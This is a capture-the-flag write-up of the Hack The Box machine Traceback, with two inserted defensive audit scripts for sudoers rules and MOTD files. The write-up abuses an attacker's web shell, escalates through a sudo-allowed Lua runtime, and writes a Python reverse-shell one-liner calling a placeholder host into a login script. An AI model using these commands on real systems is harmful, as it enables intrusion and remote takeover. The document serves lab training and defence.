Traceback — Hack The Box Writeup

inth3wild
6 min read · Aug 13, 2020

Traceback was a fun and exciting challenge box. A unique way to get root and as always, I learnt new things while attempting the challenge.

Summary

  • Perform a directory brute force with a list of names of common web shells
  • Log in to the attackers’ web shell
  • Upload and execute a PHP reverse shell
  • Get to the “sysadmin” user via the Lua scripting language
  • Get root via a manipulated ssh banner file and an ssh login/connection.

Foothold

We start with an Nmap scan to discover and enumerate running services.

nmap -sC -sV -oA traceback 10.10.10.181
Nmap scan result

Ports 80 and 22 are open which run HTTP and ssh respectively, therefore we head over to port 80 to see what’s running on the webserver.

Website’s Homepage

Okay, the website has been hacked. “CTRL-U”, to view the source code and there’s nothing of interest except this little piece of information:

source code

This means that the attacker(s) must have a way of gaining unauthorized access to the site, and they were kind enough to let us have access too 😏. But how do we find this backdoor? Notice the Xh4H in the source code picture; that looks like a handle, so we just google it. Following the link leads to a tweet about a GitHub repository with a collection of web shells: https://github.com/TheBinitGhimire/Web-Shells, “Some of the best web shells that you might need”.

google search result(LEFT). Tweet about github repo (RIGHT)

Webshell: a web shell is a malicious program that, when uploaded to a web server, gives attackers remote access to the web server’s file system (directories, files, etc.).

So, we need to find out which web shell from the GitHub repo the attacker (Xh4H) uploaded. We make a list of all the web shells in the repository and use it as our wordlist with gobuster (a web file/directory brute-force tool).

brute force list(LEFT) gobuster result(RIGHT)

Good, we’ve found a directory. On visiting the path, we are presented with a login page. I just guessed admin:admin as the credentials and it worked: we are logged into the web shell and now have access to the server’s filesystem.

web shell’s login page(LEFT) web shell’s interface(RIGHT)

You can immediately start using the web shell to traverse directories and find more files, but I wanted a command-line interface, so I uploaded a PHP reverse shell, set up my listener and got a connection.

User

Now we have a shell on the box as the “webadmin” user. Remember that the server’s homepage was just a static site, so there is nothing of interest in the “/var/www/html” directory. Moving over to our current user’s home directory, “/home/webadmin”,

webadmin’s home directory

there’s a note from the sysadmin user about a tool to practice Lua (a programming language). Also notice that we have read and write permissions (-rw) on the “.bash_history” file (always check whether you can read the .bash_history file of any user).

.bash_history file

The “.bash_history” file contains the history of executed commands. In this particular file, we see the command:

sudo -u sysadmin /home/sysadmin/luvit privesc.lua

which means that the tool luvit is used to execute the file privesc.lua on behalf of the sysadmin user (sudo -u sysadmin). Immediately afterwards, the file is removed (rm privesc.lua). Hmmm, remember the note.txt. So we just create a Lua file with the following command:

touch myfile.lua

Then I googled “lua linux privilege escalation” and followed the first link, which led to GTFOBins (a nice resource for checking which Unix binaries are exploitable). I then ran the following command to put os.execute("/bin/sh") into myfile.lua:

echo "os.execute(\"/bin/sh\")" >> myfile.lua

Finally, we execute the command:

sudo -u sysadmin /home/sysadmin/luvit myfile.lua

Boom!! We are now the sysadmin user and we can read the user flag.

sysadmin flag
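As an added example (not from the writeup or from the box itself), here is a small POSIX shell audit the box’s administrator could have run on their sudo configuration: it flags sudoers-style rules that hand a scripting runtime to another account, which is exactly what the “sudo -u sysadmin luvit” rule above allowed. The interpreter list and the file format handling are my own assumptions.

```shell
#!/bin/sh
# Added example, not part of the writeup: flag sudoers-style rules whose
# command list names a scripting interpreter (lua/luvit, python, perl ...).
# $1 is a file with sudoers-style lines (a constructed sample in the test; on a
# real host review /etc/sudoers and every file under /etc/sudoers.d/).
# Assumption: the basenames below are the interpreters worth flagging.
INTERPRETERS="lua luvit luajit python python2 python3 perl ruby node php sh bash"

is_interpreter() {
    b=$(basename "$1")
    for i in $INTERPRETERS; do
        [ "$b" = "$i" ] && return 0
    done
    return 1
}

# Print "RISKY: <rule>" for every rule whose command list names an interpreter.
list_risky_rules() {
    file="$1"
    grep -v '^[[:space:]]*#' "$file" | grep -v '^[[:space:]]*$' | grep -v '^Defaults' |
    while IFS= read -r line; do
        # Keep what follows "host=", drop the "(runas)" part and tags like NOPASSWD:
        cmds=$(printf '%s\n' "${line#*=}" | sed 's/^[[:space:]]*([^)]*)//; s/^.*://')
        # A rule may list several commands separated by commas; the first
        # word of each entry is the program path.
        echo "$cmds" | tr ',' '\n' | while IFS= read -r entry; do
            set -- $entry
            [ -n "${1:-}" ] || continue
            if is_interpreter "$1"; then
                echo "RISKY: $line"
                break
            fi
        done
    done
}

# Returns 0 when no risky rule exists, 1 (after printing them) otherwise.
audit_sudoers() {
    out=$(list_risky_rules "$1")
    [ -z "$out" ] && return 0
    echo "$out"
    return 1
}
```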

Root

Using pspy (a Linux process monitoring tool), a particular process becomes of interest.

pspy’s output

To transfer pspy (or any file) to the target machine, start a Python HTTP server on your own machine:

python3 -m http.server

It listens on port 8000 by default. Then, on the victim’s (Hack The Box) machine, go to a writable directory, preferably /tmp, and run:

wget http://YOUR-IP:8000/THE-FILE-YOU-WANT-TO-TRANSFER

Back to pspy’s output. The command copies every file in the “/var/backups/.update-motd.d/” directory to the “/etc/update-motd.d/” directory, and it runs every 30 seconds (sleep 30). The “/var/backups/.update-motd.d/” directory holds a bunch of files, but there’s nothing we can do with them because they are owned by root and we (sysadmin) only have read permission. Going over to the “/etc/update-motd.d/” directory, we see the same files as in the previous directory, but now we have both read and write access to them.

/etc/update-motd.d/ directory

After much assessment and trying to understand what the files are, the “00-header” file becomes the most important because we see our hacker’s name (Xh4H) in it. This file prints the operating system release/version, and any commands in it are executed whenever a login (via ssh) is made to the Linux server (this box).

contents of the 00-header file
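As an added example that is not part of the original writeup, here is a shell check the box’s administrator could run on the MOTD script directory instead of blindly re-copying the backups every 30 seconds: it flags scripts that a non-root account can modify and scripts whose content has drifted from the trusted backup copy. The directory paths and expected owner are arguments; the sample files in the test are constructed.

```shell
#!/bin/sh
# Added example, not part of the writeup: audit the scripts that run at every
# SSH login (the update-motd.d directory). It reports
#   1. scripts a non-root user could edit (group/other write bit, or an owner
#      other than the expected one), and
#   2. scripts whose content no longer matches the trusted backup copy.
# Arguments: live dir, backup dir, expected owner (default root).
# Returns 0 when clean, 1 when at least one finding was printed.
# Assumption: GNU find/stat (Linux), as on the target.
audit_motd() {
    live="$1"; backup="$2"; owner="${3:-root}"
    findings=0
    for f in "$live"/*; do
        [ -f "$f" ] || continue
        name=$(basename "$f")
        # Only the owner should be able to write a script that runs at login.
        if [ -n "$(find "$f" -maxdepth 0 \( -perm /022 -o ! -user "$owner" \) -print)" ]; then
            echo "WRITABLE: $f (owner $(stat -c '%U' "$f"), mode $(stat -c '%a' "$f"))"
            findings=$((findings + 1))
        fi
        # Content drift against the copy kept in the backup directory.
        if [ ! -f "$backup/$name" ]; then
            echo "UNEXPECTED: $f has no trusted copy in $backup"
            findings=$((findings + 1))
        elif ! cmp -s "$f" "$backup/$name"; then
            echo "MODIFIED: $f differs from $backup/$name"
            findings=$((findings + 1))
        fi
    done
    [ "$findings" -eq 0 ]
}

# Usage on the box: audit_motd /etc/update-motd.d /var/backups/.update-motd.d
if [ "$#" -ge 2 ]; then
    audit_motd "$@"
fi
```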

Recall that we have write permission on this file, so what I did was: copy a Python reverse shell into the “00-header” file, generate SSH keys on my system for the box, transfer the public key to the box, add it to the “authorized_keys” file of the “sysadmin” user, set up my netcat listener, and then try to ssh into the box from my system.

1) ssh-keygen -t rsa (passphrase required, I used "password")
   i) Transfer the public key using the method described above for pspy
2) cat id_rsa.pub >> /home/sysadmin/.ssh/authorized_keys
3) echo python3 -c "'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-IP-HERE\",PORT-HERE));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" >> 00-header
4) nc -nlvp 8008
5) ssh -i id_rsa sysadmin@10.10.10.181

Remember that the copy command runs every 30 seconds, so all of the above commands have to be completed within 30 seconds, especially from command no. 4 onwards. Boom!! We get a connection, and we are now the root user.

root user
